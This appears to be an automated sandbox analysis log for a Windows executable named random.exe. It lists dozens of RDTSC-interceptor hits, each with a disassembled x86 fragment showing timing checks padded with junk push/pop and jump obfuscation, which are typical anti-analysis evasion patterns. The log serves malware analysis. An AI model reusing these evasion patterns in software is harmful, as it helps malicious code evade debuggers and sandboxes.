      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 108DAC2 second address: 108DB3D instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA8D8E1DD0Fh 0x00000008 jmp 00007FA8D8E1DD09h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 jmp 00007FA8D8E1DD07h 0x00000015 push 00000000h 0x00000017 mov edi, dword ptr [ebp+122D37C9h] 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push ecx 0x00000022 call 00007FA8D8E1DCF8h 0x00000027 pop ecx 0x00000028 mov dword ptr [esp+04h], ecx 0x0000002c add dword ptr [esp+04h], 0000001Ah 0x00000034 inc ecx 0x00000035 push ecx 0x00000036 ret 0x00000037 pop ecx 0x00000038 ret 0x00000039 xchg eax, ebx 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FA8D8E1DD01h 0x00000041 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 108E2B0 second address: 108E2B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 108EC4B second address: 108EC50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 108F611 second address: 108F615 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 108F615 second address: 108F661 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007FA8D8E1DCF8h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 0000001Ch 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 sbb edi, 79C3FE84h 0x00000029 push 00000000h 0x0000002b sub dword ptr [ebp+122D2911h], ebx 0x00000031 push 00000000h 0x00000033 sub dword ptr [ebp+122D1DDBh], edi 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d pushad 0x0000003e popad 0x0000003f pushad 0x00000040 popad 0x00000041 popad 0x00000042 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1090120 second address: 1090124 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1090124 second address: 1090172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007FA8D8E1DCF8h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 mov di, 725Ah 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c jmp 00007FA8D8E1DCFAh 0x00000031 xchg eax, ebx 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 jng 00007FA8D8E1DCF6h 0x0000003b jg 00007FA8D8E1DCF6h 0x00000041 popad 0x00000042 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1090172 second address: 109017C instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA8D8E164ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 109017C second address: 1090188 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1091465 second address: 1091483 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA8D8E164A8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jo 00007FA8D8E164A8h 0x00000014 push edx 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 je 00007FA8D8E164A6h 0x0000001e rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 109222F second address: 109224D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E1DD03h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 109224D second address: 1092251 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1092251 second address: 1092257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1092257 second address: 109225C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 109225C second address: 1092262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1092262 second address: 10922EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007FA8D8E164A8h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000016h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 sbb esi, 58C6C5D6h 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push ecx 0x0000002d call 00007FA8D8E164A8h 0x00000032 pop ecx 0x00000033 mov dword ptr [esp+04h], ecx 0x00000037 add dword ptr [esp+04h], 00000015h 0x0000003f inc ecx 0x00000040 push ecx 0x00000041 ret 0x00000042 pop ecx 0x00000043 ret 0x00000044 mov esi, ecx 0x00000046 sub dword ptr [ebp+1245E0E9h], edx 0x0000004c push 00000000h 0x0000004e push 00000000h 0x00000050 push ecx 0x00000051 call 00007FA8D8E164A8h 0x00000056 pop ecx 0x00000057 mov dword ptr [esp+04h], ecx 0x0000005b add dword ptr [esp+04h], 0000001Dh 0x00000063 inc ecx 0x00000064 push ecx 0x00000065 ret 0x00000066 pop ecx 0x00000067 ret 0x00000068 xchg eax, ebx 0x00000069 push eax 0x0000006a push edx 0x0000006b jmp 00007FA8D8E164B0h 0x00000070 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10922EF second address: 109230A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA8D8E1DD07h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10973F8 second address: 10973FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1098318 second address: 1098336 instructions: 0x00000000 rdtsc 0x00000002 js 00007FA8D8E1DCF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA8D8E1DD02h 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1098336 second address: 109835C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E164B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA8D8E164AAh 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 109835C second address: 1098362 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1098362 second address: 1098366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10975B9 second address: 10975CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA8D8E1DCFEh 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10976C8 second address: 10976CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1099634 second address: 109963E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA8D8E1DCF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 109B2E1 second address: 109B312 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FA8D8E164B5h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c je 00007FA8D8E164BFh 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FA8D8E164ADh 0x00000019 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 109B57A second address: 109B57F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 109B57F second address: 109B585 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 109D60D second address: 109D628 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 jmp 00007FA8D8E1DD01h 0x0000000e pop ecx 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 109E462 second address: 109E46D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FA8D8E164A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 109E46D second address: 109E47E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jc 00007FA8D8E1DCFCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 109E47E second address: 109E4C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA8D8E164B7h 0x00000009 popad 0x0000000a nop 0x0000000b mov edi, dword ptr [ebp+122D2014h] 0x00000011 add edi, dword ptr [ebp+122D37D9h] 0x00000017 push 00000000h 0x00000019 clc 0x0000001a push 00000000h 0x0000001c xchg eax, esi 0x0000001d jmp 00007FA8D8E164B0h 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 jnc 00007FA8D8E164A6h 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 109E4C9 second address: 109E4CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 109E4CE second address: 109E4E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA8D8E164B0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 109F3DA second address: 109F468 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA8D8E1DCF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007FA8D8E1DCF8h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 mov edi, dword ptr [ebp+1244C3D1h] 0x0000002b push 00000000h 0x0000002d or dword ptr [ebp+122D2891h], edi 0x00000033 jmp 00007FA8D8E1DD06h 0x00000038 push 00000000h 0x0000003a je 00007FA8D8E1DCF9h 0x00000040 mov bx, cx 0x00000043 xchg eax, esi 0x00000044 pushad 0x00000045 push edx 0x00000046 jmp 00007FA8D8E1DD05h 0x0000004b pop edx 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007FA8D8E1DD06h 0x00000053 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 109F468 second address: 109F476 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 109F476 second address: 109F47C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 109F47C second address: 109F486 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FA8D8E164A6h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 109E66B second address: 109E68D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E1DD07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 109E68D second address: 109E691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 109E691 second address: 109E697 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10A0420 second address: 10A0466 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FA8D8E164A6h 0x0000000a popad 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007FA8D8E164AEh 0x00000012 nop 0x00000013 mov bl, al 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push edx 0x0000001c call 00007FA8D8E164A8h 0x00000021 pop edx 0x00000022 mov dword ptr [esp+04h], edx 0x00000026 add dword ptr [esp+04h], 00000015h 0x0000002e inc edx 0x0000002f push edx 0x00000030 ret 0x00000031 pop edx 0x00000032 ret 0x00000033 xchg eax, esi 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10A0466 second address: 10A0470 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA8D8E1DCF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10A641E second address: 10A6428 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FA8D8E164ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 109F5B7 second address: 109F641 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 add bh, FFFFFFEAh 0x0000000a push dword ptr fs:[00000000h] 0x00000011 mov di, bx 0x00000014 mov dword ptr fs:[00000000h], esp 0x0000001b mov dword ptr [ebp+122D2A93h], edi 0x00000021 mov eax, dword ptr [ebp+122D09E1h] 0x00000027 push 00000000h 0x00000029 push ebx 0x0000002a call 00007FA8D8E1DCF8h 0x0000002f pop ebx 0x00000030 mov dword ptr [esp+04h], ebx 0x00000034 add dword ptr [esp+04h], 0000001Dh 0x0000003c inc ebx 0x0000003d push ebx 0x0000003e ret 0x0000003f pop ebx 0x00000040 ret 0x00000041 mov edi, dword ptr [ebp+122D377Dh] 0x00000047 push FFFFFFFFh 0x00000049 push 00000000h 0x0000004b push ebp 0x0000004c call 00007FA8D8E1DCF8h 0x00000051 pop ebp 0x00000052 mov dword ptr [esp+04h], ebp 0x00000056 add dword ptr [esp+04h], 0000001Dh 0x0000005e inc ebp 0x0000005f push ebp 0x00000060 ret 0x00000061 pop ebp 0x00000062 ret 0x00000063 mov dword ptr [ebp+122D1B80h], ecx 0x00000069 push eax 0x0000006a push eax 0x0000006b push edx 0x0000006c jng 00007FA8D8E1DCFCh 0x00000072 push eax 0x00000073 push edx 0x00000074 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 109F641 second address: 109F645 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10A170B second address: 10A1710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 109F645 second address: 109F64B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10A2758 second address: 10A27AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 mov di, F2E8h 0x0000000c push dword ptr fs:[00000000h] 0x00000013 mov dword ptr fs:[00000000h], esp 0x0000001a mov bx, F91Ah 0x0000001e mov eax, dword ptr [ebp+122D0159h] 0x00000024 movzx ebx, cx 0x00000027 push FFFFFFFFh 0x00000029 mov bx, CAB3h 0x0000002d and di, F9A3h 0x00000032 nop 0x00000033 pushad 0x00000034 jmp 00007FA8D8E1DCFFh 0x00000039 jns 00007FA8D8E1DCF8h 0x0000003f push esi 0x00000040 pop esi 0x00000041 popad 0x00000042 push eax 0x00000043 jnp 00007FA8D8E1DD08h 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 109F64B second address: 109F64F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10A27AF second address: 10A27B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10A65C5 second address: 10A65F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E164ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FA8D8E164AFh 0x0000000e popad 0x0000000f push eax 0x00000010 jl 00007FA8D8E164B0h 0x00000016 push eax 0x00000017 push edx 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10AAFDD second address: 10AAFE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10AAFE1 second address: 10AB02E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FA8D8E164B6h 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007FA8D8E164B8h 0x00000016 jmp 00007FA8D8E164B3h 0x0000001b popad 0x0000001c rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10AF013 second address: 10AF01D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FA8D8E1DCF6h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10AF01D second address: 10AF029 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10AF029 second address: 10AF034 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FA8D8E1DCF6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10AF4A7 second address: 10AF4AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10B4886 second address: 10B488A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10B488A second address: 10B4890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10B491A second address: 10B491E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10B491E second address: 10B4934 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA8D8E164A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007FA8D8E164A8h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10B4934 second address: 10B4975 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E1DCFFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e jmp 00007FA8D8E1DD04h 0x00000013 jp 00007FA8D8E1DCF8h 0x00000019 popad 0x0000001a mov eax, dword ptr [eax] 0x0000001c push eax 0x0000001d push edx 0x0000001e ja 00007FA8D8E1DCF8h 0x00000024 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10B4975 second address: 10B4985 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA8D8E164ACh 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10B4985 second address: 10B4999 instructions: 0x00000000 rdtsc 0x00000002 js 00007FA8D8E1DCF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 pushad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10B4999 second address: 10B49AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FA8D8E164A6h 0x0000000a popad 0x0000000b jbe 00007FA8D8E164ACh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10B4B53 second address: 10B4B93 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA8D8E1DCF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c jp 00007FA8D8E1DD07h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FA8D8E1DD06h 0x0000001e rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10B8561 second address: 10B8568 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10B8ABF second address: 10B8AC4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10B8AC4 second address: 10B8ADC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007FA8D8E164ACh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10B8C32 second address: 10B8C44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA8D8E1DCFEh 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10B8C44 second address: 10B8C79 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jl 00007FA8D8E164A6h 0x0000000d jmp 00007FA8D8E164B3h 0x00000012 pop eax 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FA8D8E164B1h 0x0000001b rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10B8F26 second address: 10B8F2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10B90A3 second address: 10B90A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10B90A9 second address: 10B90BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E1DCFEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10B90BF second address: 10B90C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10B90C3 second address: 10B90E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FA8D8E1DCF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jc 00007FA8D8E1DD02h 0x00000016 jc 00007FA8D8E1DCF6h 0x0000001c jo 00007FA8D8E1DCF6h 0x00000022 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10B90E5 second address: 10B90ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
